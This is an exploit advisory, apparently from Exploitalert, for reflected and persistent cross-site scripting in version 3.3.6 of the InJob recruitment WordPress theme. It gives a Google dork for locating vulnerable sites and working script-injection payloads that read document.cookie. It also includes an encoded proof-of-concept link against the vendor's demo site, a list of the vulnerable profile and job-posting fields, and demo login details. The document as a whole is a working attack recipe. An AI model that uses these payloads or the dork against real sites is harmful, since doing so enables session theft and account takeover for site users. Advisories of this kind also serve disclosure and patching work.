InJob | Multi-purpose for recruitment WordPress Theme v3.3.6 Reflected & Persistent XSS

# Exploit Title: InJob | Multi-purpose for recruitment WordPress Theme v3.3.6 Reflected & Persistent XSS
# Google Dork: inurl:/wp-content/themes/injob/
# Date: 15/09/2019
# Exploit Author: SubversA
# Vendor Homepage: http://www.inwavethemes.com/
# Software Link: https://themeforest.net/item/injob-job-board-wordpress-theme/20322987
# Version: 3.3.6
# Tested on: Parrot OS
# CVE : -
# CWE : 79


----[]- Reflected XSS: -[]----
Use your payload inside the Enter Keywords input field and then submit the form  payload will be triggered twice.

Payload Sample: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">

PoC Link: http://jobboard.inwavethemes.com/jobs/?keyword=%3C%21--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28document.cookie%29%2F%2F%22%3E&iwj_location=&iwj_cat=&iwj_type=&iwj_skill=&iwj_level=&iwj_salary=


----[]- Persistent XSS #1: -[]----
You need a new basic user account, then go to the dashboard and edit your profile. Vulnerable input fields:
- Phone & Headline *;
- Title input field in the Skills section;
- Title, Description, Date In - Date Out & Company Name in the Experiences section;
- Title, Description & School Name in the Educations section;
- Address * input field in the Location & Map section.
Use your payload inside any vulnerable input field and save your profile.

Payload Sample: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">

PoC: log in as candidate:demo (login/password) and go to the dashboard or as guest go to the http://jobboard.inwavethemes.com/employers?alpha=i page.


----[]- Persistent XSS #2: -[]----
You need an employer user account, then go to the http://jobboard.inwavethemes.com/dashboard/?iwj_tab=new-job page to create a new job offer. Vulnerable input fields: Salary Postfix Text and Address *.

Payload Sample: <img src=x onerror=(alert)(document.domain)//">

Copyright ©2024 Exploitalert.